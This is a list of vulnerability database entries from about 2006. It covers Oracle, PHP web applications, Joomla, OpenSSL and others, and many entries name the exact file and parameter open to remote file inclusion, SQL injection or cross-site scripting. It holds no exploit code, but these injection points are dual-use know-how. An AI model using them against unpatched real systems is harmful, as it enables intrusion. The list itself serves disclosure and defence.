Unspecified vulnerability in Oracle Containers for J2EE in Oracle Application Server 9.0.4.3, 10.1.2.0.0, and 10.1.2.0.1, and Oracle Collaboration Suite 9.0.4.2 and 10.1.2, has unknown impact and remote attack vectors, aka Vuln# OC4J03.
Unspecified vulnerability in Oracle Forms component in Oracle Application Server 9.0.4.2 has unknown impact and remote attack vectors, aka Vuln# FORM03.
Multiple unspecified vulnerabilities in Oracle Reports Developer component in Oracle Application Server 9.0.4.3 and 10.1.2.0.2, and Oracle E-Business Suite and Applications 11.5.10CU2, have unknown impact and remote attack vectors, aka Vuln# (1) REP01 and (2) REP02. NOTE: as of 20061027, Oracle has not disputed reports from a reliable researcher that these issues are related to (a) showenv and (b) parsequery for REP01, and (c) cellwrapper and (d) delimiter for REP02.
Unspecified vulnerability in Oracle Forms component in Oracle Application Server 9.0.4.3 and 10.1.2.0.2 has unknown impact and remote attack vectors, aka Vuln# FORM01.
Unspecified vulnerability in Oracle HTTP Server component in Oracle Application Server 10.1.2.0.1, 10.1.2.0.2, and 10.1.2.1.0 has unknown impact and remote attack vectors related to the PHP Module, aka Vuln# OHS03.
Unspecified vulnerability in Oracle Containers for J2EE component in Oracle Application Server 9.0.4.3, 10.1.2.0.2, and 10.1.2.1.0, and Collaboration Suite 9.0.4.2 and 10.1.2, has unknown impact and remote attack vectors, aka Vuln# OC4J02.
Unspecified vulnerability in Oracle Single Sign-On component in Oracle Application Server 9.0.4.3, 10.1.2.0.2, and 10.1.2.1.0, Collaboration Suite 9.0.4.2 and 10.1.2, and Oracle E-Business Suite and Applications 11.5.10CU2 has unknown impact and remote attack vectors, aka Vuln# SSO01.
Unspecified vulnerability in Oracle HTTP Server 9.2.0.7 and 10.1.0.5, Application Server 9.0.4.3, 10.1.2.0.2, 10.1.2.1.0, and 10.1.3.0, racle Collaboration Suite 9.0.4.2 and 10.1.2, and Oracle E-Business Suite and Applications 11.5.10CU2 has unknown impact and remote attack vectors, aka Vuln# OHS06.
Unspecified vulnerability in Oracle HTTP Server component in Oracle Application Server 9.0.4.3, 10.1.2.0.2, 10.1.2.1.0, and 10.1.3.0.0, and Oracle Collaboration Suite 9.0.4.2 and 10.1.2, has unknown impact and remote attack vectors related to the Mod_rewrite Module, aka Vuln# OHS01.
Multiple unspecified vulnerabilities in Oracle Application Express 1.5 up to 1.6.1 have unknown impact and remote attack vectors, aka Vuln# (1) APEX04, (2) APEX20, and (3) APEX21.
Multiple unspecified vulnerabilities in Oracle Application Express (formerly Oracle HTML DB) 1.5 up to 2.0 have unknown impact and remote attack vectors, aka Vuln# (1) APEX01, (2) APEX02, (3) APEX03, (4) APEX05, (5) APEX06, (6) APEX07, (7) APEX08, (8) APEX09, (9) APEX10, (10) APEX11, (11) APEX12, (12) APEX13, (13) APEX14, (14) APEX15, (15) APEX16, (16) APEX17, (17) APEX18, (18) APEX19, (19) APEX22, (20) APEX23, (21) APEX24, (22) APEX25, (23) APEX26, (24) APEX27, (25) APEX28, (26) APEX29, (27) APEX30, (28) APEX31, (29) APEX32, (30) APEX33, (31) APEX34, and (32) APEX35.  NOTE: as of 20061027, it is likely that some of these identifiers are associated with cross-site scripting (XSS) in WWV_FLOW_ITEM_HELP and NOTIFICATION_MSG, but these have been provided separate identifiers.
Unspecified vulnerability in Oracle HTTP Server 9.2.0.7 and Oracle E-Business Suite and Applications 11.5.10CU2 has unknown impact and local attack vectors, aka Vuln# OHS08.
Unspecified vulnerability in Oracle HTTP Server 9.2.0.7, when running on HP Tru64 UNIX, has unknown impact and remote attack vectors related to HTTPS and SSL, aka Vuln# OHS07.
Unspecified vulnerability in Oracle HTTP Server 9.2.0.7, Oracle Collaboration Suite 9.0.4.2, and Oracle E-Business Suite and Applications 11.5.10CU2 has unknown impact and remote attack vectors related to HTTPS and SSL, aka Vuln# OHS05.
Unspecified vulnerability in Oracle HTTP Server 9.2.0.7 and Oracle Collaboration Suite 9.0.4.2 has unknown impact and remote attack vectors related to HTTPS and SSL, aka Vuln# OHS04.
Unspecified vulnerability in Oracle HTTP Server 9.2.0.7, as used in Oracle Collaboration Suite 9.0.4.2 and Oracle E-Business Suite and Applications 11.5.10CU2, has unknown impact and remote attack vectors related to htdigest, aka Vuln# OHS02.
Unspecified vulnerability in Oracle Spatial component in Oracle Database 9.0.1.5, 9.2.0.7, and 10.1.0.4 has unknown impact and remote authenticated attack vectors related to mdsys.sdo_geom, aka Vuln# DB22.  NOTE: as of 20061023, Oracle has not disputed reports from reliable third parties that DB22 is related to "length checking" in the RELATE function before MD2.RELATE is called.
Multiple unspecified vulnerabilities in Oracle Spatial component in Oracle Database 8.1.7.4, 9.0.1.5, 9.2.0.7, and 10.1.0.4 have unknown impact and remote authenticated attack vectors related to (1) mdsys.sdo_3gl, aka Vuln# DB20, and (2) mdsys.sdo_cs, aka DB21.  NOTE: as of 20061023, Oracle has not disputed reports from reliable third parties that DB20 is a buffer overflow in GEOM_OPERATION, and DB21 is related to a buffer overflow and SQL injection in TRANSFORM_LAYER.
Unspecified vulnerability in Database Scheduler component in Oracle Database 10.1.0.3 has unknown impact and remote authenticated attack vectors related to sys.dbms_scheduler, aka Vuln# DB19.
Unspecified vulnerability in Oracle Spatial component in Oracle Database 9.0.1.5, 9.2.0.6, and 10.1.0.3 has unknown impact and remote authenticated attack vectors related to mdsys.sdo_tune, aka Vuln# DB18.  NOTE: as of 20061023, Oracle has not disputed reports from reliable third parties that DB18 might be related to SQL injection in the EXTENT_OF function.
Multiple unspecified vulnerabilities in XMLDB component in Oracle Database 9.2.0.8, 10.1.0.5, and 10.2.0.2 have unknown impact and remote authenticated attack vectors, aka (1) Vuln# DB14 and (2) DB15 related to xdb.dbms_xdbz.  NOTE: as of 20061023, Oracle has not disputed reports from reliable third parties that DB14 is for SQL injection in the PITRIG_DROP and PITRIG_DROPMETADATA functions in XDB_PITRIG_PKG, and DB15 is for SQL injection in DISABLE_HIERARCHY_INTERNAL in DBMS_XDBZ.
Multiple unspecified vulnerabilities in Oracle Spatial component in Oracle Database 8.1.7.4, 9.0.1.5, 9.2.0.8, 10.1.0.5, and 10.2.0.2 have unknown impact and remote authenticated attack vectors related to (1) mdsys.sdo_lrs, aka Vuln# DB13, and (2) Vuln# DB17.  NOTE: as of 20061023, Oracle has not disputed reports from reliable third parties that DB13 is related to bypassing input validation for SQL injection related to convert_to_lrs_layer and dbms_assert, and DB17 is related to SQL injection in the trigger in the SDO_DROP_USER package.
Unspecified vulnerability in Oracle Spatial component in Oracle Database 8.1.7.4, 9.0.1.5, 9.2.0.7, and 10.1.0.4 has unknown impact and remote authenticated attack vectors related to mdsys.sdo_geom, aka Vuln# DB11.  NOTE: as of 20061023, Oracle has not disputed reports from reliable third parties that DB11 is related to "length checking" in the RELATE function before MD2.RELATE is called.
Unspecified vulnerability in the Core RDBMS component in Oracle Database 10.1.0.5 has unknown impact and remote authenticated attack vectors related to sys.dbms_sqltune, aka Vuln# DB10.  NOTE: as of 20061023, Oracle has not disputed reports from reliable third parties that DB10 is for SQL injection in DROP_SQLSET, DELETE_SQLSET, SELECT_SQLSET, and I_SET_TUNING_PARAMETER.  NOTE: some of these vectors might be in DBMS_SQLTUNE_INTERNAL.
Unspecified vulnerability in the Core RDBMS component in Oracle Database 9.0.1.5, 9.2.0.8, 10.1.0.5, and 10.2.0.2 has unknown impact and remote authenticated attack vectors, aka Vuln# DB09.
Multiple unspecified vulnerabilities in the Change Data Capture (CDC) component in Oracle Database 9.2.0.7, 10.1.0.5, and have unknown impact and remote authenticated attack vectors related to (1) sys.dbms_cdc_ipublish (Vuln# DB05) and (2) sys.dbms_cdc_isubscribe (DB06).  NOTE: as of 20061023, Oracle has not disputed reports from reliable third parties that DB05 is for SQL injection in CREATE_CHANGE_TABLE and CHANGE_TABLE_TRIGGER, and DB06 is for PL/SQL injection in the PREPARE_UNBOUNDED_VIEW procedure.
Multiple unspecified vulnerabilities in Oracle Database 10.1.0.5 and 10.2.0.2 have unknown impact and remote authenticated attack vectors related to (1) Vuln# DB04 and sys.dbms_cdc_impdp in the (a) Change Data Capture (CDC) component; (2) Vuln# DB07, (3) DB08, and (4) DB16 in sys.dbms_cdc_isubscribe in CDC; and (5) mdsys.sdo_geor_int in the (b) Oracle Spatial component, aka DB12.  NOTE: as of 20061023, Oracle has not disputed reports from reliable third parties that these issues are related to SQL injection in the BUMP_SEQUENCE function (DB04), CREATE_SUBSCRIPTION (DB07), EXTEND_WINDOW_LIST (DB08), SUBSCRIBE (DB16), and COMPRESSDATA (DB12).
Unspecified vulnerability in Oracle Spatial component in Oracle Database 9.0.1.5, 9.2.0.7, and 10.1.0.5 has unknown impact and remote authenticated attack vectors related to mdsys.md2, aka Vuln# DB03. NOTE: as of 20061023, Oracle has not disputed reports from reliable third parties that DB03 is related to one or more of (1) a buffer overflow in the (a) RELATE function or (2) SQL injection in the (b) TESSELATE_FIXED and (c) TESSELATE function.
Unspecified vulnerability in Oracle Spatial component in Oracle Database 10.2.0.2 has unknown impact and remote authenticated attack vectors related to "create session" privileges, aka Vuln# DB02.  NOTE: as of 20061023, Oracle has not disputed reports from reliable third parties that DB02 is for SQL injection in the SDO_DROP_USER_BEFORE package using a Trigger for a DROP USER statement in an anonymous PL/SQL block.
Unspecified vulnerability in xdb.dbms_xdbz in the XMLDB component for Oracle Database 9.2.0.6 and 10.1.0.4 has unknown impact and remote authenticated attack vectors, aka Vuln# DB01.  NOTE: as of 20061023, Oracle has not disputed reports from reliable third parties that DB01 is for PL/SQL injection in the ENABLE_HIERARCHY_INTERNAL procedure.
PHP remote file inclusion vulnerability in language/lang/lang_contact_faq.php in the Prillian French 0.8.0 and earlier module for phpBB allows remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Secure Computing SafeWord RemoteAccess 2.1 allows local users to obtain the UserCenter webportal password, database encryption keys, and signing keys by reading (1) base-64 encoded data in SERVERS\Web\Tomcat\usercenter\WEB-INF\login.conf and (2) plaintext data in SERVERS\Shared\signers.cfg.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Unspecified vulnerability in IKE.NLM in Novell BorderManager 3.8 allows attackers to cause a denial of service (crash) via unknown attack vectors related to "VPN issues" for certain "IKE and IPsec settings."
Heap-based buffer overflow in an unspecified procedure in Trend Micro ServerProtect 5.7 and 5.58 allows remote attackers to execute arbitrary code via unknown vectors, probably related to an RPC interface.
PHP remote file inclusion vulnerability in compteur.php in Compteur 2 allows remote attackers to execute arbitrary PHP code via a URL in the cp parameter.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
PHP remote file inclusion vulnerability in index.php in Deep CMS 2.0a allows remote attackers to execute arbitrary PHP code via a URL in the ConfigDir parameter.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Eazy Cart stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a customer database via a direct request for admin/config/customer.dat.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Unspecified vulnerability in the file upload module in Blue Smiley Organizer before 4.45 has unknown impact and attack vectors.
PHP remote file inclusion vulnerability in includes/functions_kb.php in Dimension of phpBB 0.2.6 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter. NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Unspecified vulnerability in Adobe Breeze 5 Licensed Server and Breeze 5.1 Licensed Server allows attackers to read arbitrary files via unknown vectors related to "URL parsing."
Multiple cross-site scripting (XSS) vulnerabilities in Wheatblog 1.0 and 1.1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Cross-site scripting (XSS) vulnerability in John Himmelman (aka DaRk2k1) PowerPortal 1.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, possibly related to registering a user.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
PHP remote file inclusion vulnerability in script.php in Kevin A. Gordon Open Geo Targeting (aka geotarget) allows remote attackers to execute arbitrary PHP code via a URL in the anp_path parameter.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Buffer overflow in GuildFTPd 0.999.13 allows remote attackers to have an unknown impact, possibly code execution related to input containing "globbing chars."
Multiple cross-site scripting (XSS) vulnerabilities in ph03y3nk just another flat file (JAF) CMS 4.0 RC1 allow remote attackers to inject arbitrary web script or HTML via the (1) name, (2) url, (3) title, and (4) about parameters in a forum post.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Directory traversal vulnerability in common.php in Yuuki Yoshizawa Exporia 0.3.0 allows remote attackers to include and execute local files via a .. (dot dot) in the lan parameter to includes.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in home.php in PHP Invoice 2.2 allows remote attackers to inject arbitrary web script or HTML via the msg parameter, a different vector than CVE-2006-5074.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Multiple cross-site scripting (XSS) vulnerabilities in Phoenix Evolution CMS (PECMS) allow remote attackers to inject arbitrary web script or HTML via the (1) mod or (2) action parameters in index.php, or the (3) pageid parameter in modules/pageedit/index.php.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
** DISPUTED **
Multiple cross-site scripting (XSS) vulnerabilities in BirdBlog 1.4 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) entryid parameter in comment.php, (2) page parameter in index.php, or the (3) uid parameter in user.php.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Unspecified vulnerability in portable OpenSSH before 4.4, when running on some platforms, allows remote attackers to determine the validity of usernames via unknown vectors involving a GSSAPI "authentication abort."
Multiple cross-site scripting (XSS) vulnerabilities in Paul Smith Computer Services vCAP 1.7.0 allow remote attackers to inject arbitrary web script or HTML via (1) the statusmsg parameter in RegisterPage.cgi or (2) a URI corresponding to a nonexistent file. NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Multiple unspecified vulnerabilities in Paisterist Simple HTTP Scanner (sHTTPScanner) before 0.3 have unknown impact and attack vectors.
Multiple unspecified vulnerabilities in Paisterist Simple HTTP Scanner (sHTTPScanner) before 0.2 have unknown impact and attack vectors.
Multiple unspecified vulnerabilities in Paisterist Simple HTTP Scanner (sHTTPScanner) before 0.4 have unknown impact and attack vectors.
Multiple PHP remote file inclusion vulnerabilities in redgun RedBLoG 0.5 allow remote attackers to execute arbitrary PHP code via a URL in (1) the root parameter in imgen.php, and the root_path parameter in (2) admin/config.php, (3) common.php, and (4) admin/index.php.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Multiple buffer overflows in WS_FTP Server 5.05 before Hotfix 1, and possibly other versions down to 5.0, have unknown impact and remote authenticated attack vectors via the (1) XCRC, (2) XMD5, and (3) XSHA1 commands.  NOTE: in the early publication of this identifier on 20060926, the description was used for the wrong issue.
The clip_mkip function in net/atm/clip.c of the ATM subsystem in Linux kernel allows remote attackers to cause a denial of service (panic) via unknown vectors that cause the ATM subsystem to access the memory of socket buffers after they are freed (freed pointer dereference).
Unspecified vulnerability in JoomlaLib (com_joomlalib) before 1.2.2 for Joomla! allows remote attackers to have an unknown impact, related to "Joomla globals hacked by script kiddies."
Stack-based buffer overflow in tftpd.exe in ProSysInfo TFTP Server TFTPDWIN 0.4.2 and earlier allows remote attackers to execute arbitrary code or cause a denial of service via a long file name. NOTE: the provenance of this information is unknown; the details are obtained from third party information.
PHP remote file inclusion vulnerability in Shadowed Portal 5.599 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the root parameter in (1) footer.php and (2) header.php.  NOTE: the provenance of this information is unknown; the details are obtained from third party information. The bottom.php parameter is already covered by CVE-2006-4826.
Multiple cross-site scripting (XSS) vulnerabilities in IDevSpot iSupport 1.8 allow remote attackers to inject arbitrary web script or HTML via (1) the suser parameter in support/rightbar.php, (2) the ticket_id parameter in support/open_tickets.php, and (3) the cons_page_title parameter in index.php.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Multiple unspecified vulnerabilities in (1) index.php, (2) minixml.inc.php, (3) doc.inc.php, (4) element.inc.php, (5) node.inc.php, (6) treecomp.inc.php, (7) forum.html.php, (8) forum.php, (9) antihack.php, (10) content.php, (11) initglobals.php, and (12) imanager.php in Limbo (aka Lite Mambo) CMS 1.0.4.2 before 20060311 have unknown impact and attack vectors.
PHP remote file inclusion vulnerability in system/_b/contentFiles/gBHTMLEditor.php in BolinOS 4.5.5 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the gBRootPath parameter.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Unspecified vulnerability in Citrix Access Gateway with Advanced Access Control (AAC) 4.2 before 20060914, when AAC is configured to use LDAP authentication, allows remote attackers to bypass authentication via unknown vectors.
Unspecified vulnerability in IP over DNS is now easy (iodine) before 0.3.2 has unknown impact and attack vectors, related to "potential security problems."
Directory traversal vulnerability in EditBlogTemplatesPlugin.java in David Czarnecki Blojsom 2.30 allows remote attackers to have an unknown impact by sending an HTTP request with a certain value of blogTemplate.
Unspecified vulnerability in X.25 on HP-UX B.11.00, B.11.11, and B.11.23 allows local users to cause an unspecified denial of service via unknown vectors.
Multiple cross-site scripting (XSS) vulnerabilities in e107 0.7.5 allow remote attackers to inject arbitrary web script or HTML via the query string (PATH_INFO) in (1) contact.php, (2) download.php, (3) admin.php, (4) fpw.php, (5) news.php, (6) search.php, (7) signup.php, (8) submitnews.php, and (9) user.php.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Heap-based buffer overflow in the DirectAnimation Path Control (DirectAnimation.PathControl) COM object (daxctle.ocx) for Internet Explorer 6.0 SP1, on Chinese and possibly other Windows distributions, allows remote attackers to execute arbitrary code via unknown manipulations in arguments to the KeyFrame method, possibly related to an integer overflow, as demonstrated by daxctle2, and a different vulnerability than CVE-2006-4446.
Multiple direct static code injection vulnerabilities in add_go.php in Stefan Ernst Newsscript (aka WM-News) 0.5 beta allow remote attackers to execute arbitrary PHP code via the (1) description, (2) issue, (3) title, (4) var, (5) name, (6) keywords, and (7) note parameters, which are stored in an article file.  NOTE: the original source of this vulnerability is unknown; the details are obtained from third party information and CVE post-disclosure analysis.
Multiple directory traversal vulnerabilities in Stefan Ernst Newsscript (aka WM-News) 0.5beta allow remote attackers to (1) read arbitrary local files via a .. (dot dot) sequence in the ide parameter in modify.php and (2) write to arbitrary local files via a .. sequence in the var parameter in add_go.php.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
SQL injection vulnerability in alpha.php in phpMyDirectory 10.4.6 and earlier allows remote attackers to execute arbitrary SQL commands via the letter parameter.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Cross-site scripting (XSS) vulnerability in alpha.php in phpMyDirectory 10.4.6 and earlier allows remote attackers to inject arbitrary web script or HTML via the letter parameter.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Unspecified vulnerability in Microsoft Visual Basic (VB) 6 has an unknown impact ("overflow") via a project that contains a certain Click event procedure, as demonstrated using the msgbox function and the VB.Label object.
Unspecified vulnerability in the driver for the Client Service for NetWare (CSNW) in Microsoft Windows 2000 SP4, XP SP2, and Server 2003 up to SP1 allows remote attackers to cause a denial of service (hang and reboot) via has unknown attack vectors, aka "NetWare Driver Denial of Service Vulnerability."
SQL injection vulnerability in consult/joueurs.php in Uni-Vert PhpLeague 0.82 and earlier allows remote attackers to execute arbitrary SQL commands via the id_joueur parameter.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Multiple PHP remote file inclusion vulnerabilities in C-News.fr C-News 1.0.1 and earlier, when register_globals is enabled, allow remote attackers to execute arbitrary PHP code via a URL in the path parameter in (1) formulaire_commentaires.php, (2) affichage/liste_news.php, (3) affichage/news_complete.php, or (4) affichage/pagination.php.  NOTE: the provenance of some of this information is unknown; some details are obtained from third party information.
PHP remote file inclusion vulnerability in settings.php in Pheap 1.2, and possibly earlier, allows remote attackers to execute arbitrary PHP code via a URL in the lpref parameter.  NOTE: the provenance of this information is unknown; the details are obtained from third party information. The lib/config.php vector is already covered by CVE-2006-4531.
SQL injection vulnerability in admin/default.asp in Jetstat.com JS ASP Faq Manager 1.10 and earlier allows remote attackers to execute arbitrary SQL commands via the uid parameter, a different vector than CVE-2006-4463.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
(1) includes/widgets/module_company_tickets.php and (2) includes/widgets/module_track_tickets.php Client Support Center in Cerberus Helpdesk 3.2 Build 317, and possibly earlier, allows remote attackers to bypass security restrictions and obtain sensitive information via the ticket parameter.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
xbiff2 1.9 creates $HOME/.xbiff2rc in a user's home directory with insecure file permissions, which allows local users to obtain sensitive information such as login credentials.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
The stripos function in PHP before 5.1.5 has unknown impact and attack vectors related to an out-of-bounds read.
Buffer overflow in the LWZReadByte_ function in ext/gd/libgd/gd_gif_in.c in the GD extension in PHP before 5.1.5 allows remote attackers to have an unknown impact via a GIF file with input_code_size greater than MAX_LWZ_BITS, which triggers an overflow when initializing the table array.
Multiple unspecified vulnerabilities in Joomla! before 1.0.11, related to "Injection Flaws," allow attackers to have an unknown impact via (1) globals.php, which uses include_once() instead of require(); (2) the $options variable; (3) Admin Upload Image; (4) -&gt;load(); (5) content submissions when frontpage is selected; (6) the mosPageNav constructor; (7) saveOrder functions; (8) the absence of "exploit blocking rules" in htaccess; and (9) the ACL.
Joomla! before 1.0.11 does not limit access to the Admin Popups functionality, which has unknown impact and attack vectors.
Multiple unspecified vulnerabilities in Joomla! before 1.0.11 allow attackers to bypass user authentication via unknown vectors involving the (1) do_pdf command and the (2) emailform com_content task.
Joomla! before 1.0.11 omits some checks for whether _VALID_MOS is defined, which allows attackers to have an unknown impact, possibly resulting in PHP remote file inclusion.
Multiple unspecified vulnerabilities in Joomla! before 1.0.11, related to unvalidated input, allow attackers to have an unknown impact via unspecified vectors involving the (1) mosMail, (2) JosIsValidEmail, and (3) josSpoofValue functions; (4) the lack of inclusion of globals.php in administrator/index.php; (5) the Admin User Manager; and (6) the poll module.
Paessler IPCheck Server Monitor before 5.3.3.639/640 does not properly implement a "list of acceptable host IP addresses in the probe settings," which has unknown impact and attack vectors.
PHP remote file inclusion vulnerability in index.php in phpECard 2.1.4 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the include_path parameter.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Multiple PHP remote file inclusion vulnerabilities in Ay System Solutions CMS 2.6 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the path[ShowProcessHandle] parameter to (1) home.php or (2) impressum.php.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Multiple PHP remote file inclusion vulnerabilities in phpCOIN 1.2.3 allow remote attackers to execute arbitrary PHP code via the _CCFG[_PKG_PATH_INCL] parameter in coin_includes scripts including (1) api.php, (2) common.php, (3) core.php, (4) custom.php, (5) db.php, (6) redirect.php or (7) session_set.php.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
A logic error in LoginWindow in Apple Mac OS X 10.4 through 10.4.7, allows network accounts without GUIds to bypass service access controls and log into the system using loginwindow via unknown vectors.
PHP remote file inclusion vulnerability in index.php in RedBLoG 0.5 allows remote attackers to execute arbitrary PHP code via a URL in the root_path parameter.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
The get_server_hello function in the SSLv2 client code in OpenSSL 0.9.7 before 0.9.7l, 0.9.8 before 0.9.8d, and earlier versions allows remote servers to cause a denial of service (client crash) via unknown vectors that trigger a null pointer dereference.
Buffer overflow in the format command in Solaris 8, 9, and 10 allows local users with access to format (such as the "File System Management" RBAC profile) to execute arbitrary code via unknown vectors, a different vulnerability than CVE-2006-4307.
Multiple unspecified vulnerabilities in Cisco VPN 3000 series concentrators before 4.1, 4.1.x up to 4.1(7)L, and 4.7.x up to 4.7(2)F allow attackers to execute the (1) CWD, (2) MKD, (3) CDUP, (4) RNFR, (5) SIZE, and (6) RMD FTP commands to modify files or create and delete directories via unknown vectors.
Race condition in (1) libnsl and (2) TLI/XTI API routines in Sun Solaris 10 allows remote attackers to cause a denial of service ("tight loop" and CPU consumption for listener applications) via unknown vectors related to TCP fusion (do_tcp_fusion).
Cross-site scripting (XSS) vulnerability in tiki-searchindex.php in TikiWiki 1.9.4 allows remote attackers to inject arbitrary web script or HTML via the highlight parameter.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Multiple PHP remote file inclusion vulnerabilities in Tutti Nova 1.6 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the TNLIB_DIR parameter to (1) include/novalib/class.novaAdmin.mysql.php and (2) novalib/class.novaRead.mysql.php.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
** REJECT **
Symantec Veritas NetBackup PureDisk Remote Office Edition 6.0 before MP1 20060816 allows remote attackers to bypass authentication and gain privileges via unknown attack vectors in the management interface.
PHP remote file inclusion vulnerability in modules/usersonline/users.php in WEBInsta CMS 0.3.1 allows remote attackers to execute arbitrary PHP code via a URL in the module_dir parameter, a different vulnerability than CVE-2006-4196.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Unspecified vulnerability in the LP subsystem in HP-UX B.11.00, B.11.04, B.11.11, and B.11.23 allows remote attackers to cause a denial of service via unknown vectors.
Format string vulnerability in the sqllog function in the SQL accounting code for radiusd in GNU Radius 1.2 and 1.3 allows remote attackers to execute arbitrary code via unknown vectors.
SQL injection vulnerability in gc.php in GeheimChaos 0.5 and earlier allows remote attackers to execute arbitrary SQL commands via the Temp_entered_password parameter.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Multiple buffer overflows in Andy Lo-A-Foe AlsaPlayer 0.99.76 and earlier allow remote attackers to cause a denial of service (application crash), or have other unknown impact, via (1) a long Location field sent by a web server, which triggers an overflow in the reconnect function in reader/http/http.c; (2) a long URL sent by a web server when AlsaPlayer is seeking a media file for the playlist, which triggers overflows in new_list_item and CbUpdated in interface/gtk/PlaylistWindow.cpp; and (3) a long response sent by a CDDB server, which triggers an overflow in cddb_lookup in input/ccda/cdda_engine.c.
Cross-site scripting (XSS) vulnerability in admin.cgi in mojoscripts.com mojoGallery allows remote attackers to inject arbitrary web script or HTML via the username parameter.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Cross-site scripting (XSS) vulnerability in index.php in Elaine Aquino Online Zone Journals (OZJournals) 1.5 allows remote attackers to inject arbitrary web script or HTML via the keywords parameter.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
PHP remote file inclusion vulnerability in Olaf Noehring The Search Engine Project (TSEP) 0.942 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the tsep_config[absPath] parameter to pagenavigation.php, a different vector than CVE-2006-4055.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Unspecified vulnerability in phpAutoMembersArea (phpAMA) before 3.2.4 has unknown impact and attack vectors, related to "a potential security exploit which is critical."
PHP remote file inclusion vulnerability in viewevent.php in myWebland myEvent 1.x allows remote attackers to execute arbitrary PHP code via a URL in the myevent_path parameter, a different vector than CVE-2006-4040.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Multiple PHP remote file inclusion vulnerabilities in Wim Fleischhauer docpile: wim's edition (docpile:we) 0.2.2 allow remote attackers to execute arbitrary PHP code via a URL in the INIT_PATH parameter to (1) lib/access.inc.php, (2) lib/folders.inc.php, (3) lib/init.inc.php or (4) lib/templates.inc.php.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Multiple PHP remote file inclusion vulnerabilities in ME Download System 1.3 allow remote attackers to execute arbitrary PHP code via a URL in the (1) Vb8878b936c2bd8ae0cab parameter to (a) inc/sett_style.php or (b) inc/sett_smilies.php; or the (2) Vb6c4d0e18a204a63b38f, (3) V18a78b93c3adaaae84e2, or (4) V9ae5d2ca9e9e787969ff parameters to (c) inc/datei.php.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Unspecified vulnerability in the utxconfig utility in Sun Ray Server Software 3.x allows local users to create or overwrite arbitrary files via unknown attack vectors.
Netious CMS 0.4 initializes session IDs based on the client IP address, which allows remote attackers to gain access to the administration section when originating from the same IP address as the administrator.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
SQL injection vulnerability in index.php in Netious CMS 0.4 and earlier allows remote attackers to execute arbitrary SQL commands via the username parameter.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Multiple unspecified vulnerabilities in WordPress before 2.0.4 have unknown impact and remote attack vectors.  NOTE: due to lack of details, it is not clear how these issues are different from CVE-2006-3389 and CVE-2006-3390, although it is likely that 2.0.4 addresses an unspecified issue related to "Anyone can register" functionality (user registration for guests).
Hewlett-Packard (HP) ProCurve 3500yl, 6200yl, and 5400zl switches with software before K.11.33 allow remote attackers to cause a denial of service (possibly memory leak or system crash) via unknown vectors.
PHP remote file inclusion vulnerability in about.mgm.php in Mambo Gallery Manager (MGM) 0.95r2 and earlier for Mambo 4.5 allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Unspecified vulnerability in a Verity third party library, as used on Adobe ColdFusion MX 7 through MX 7.0.2 and possibly other products, allows local users to execute arbitrary code via unknown attack vectors.
Unspecified vulnerability in CA eTrust Antivirus WebScan before 1.1.0.1048 has unknown impact and remote attackers related to "improper processing of outdated WebScan components."
SQL injection vulnerability in top.php in X-Scripts X-Poll, probably 2.30, allows remote attackers to execute arbitrary SQL commands via the poll parameter.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Stack-based buffer overflow in EFS Software Easy File Sharing FTP Server 2.0 allows remote attackers to execute arbitrary code via a long argument to the PASS command.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
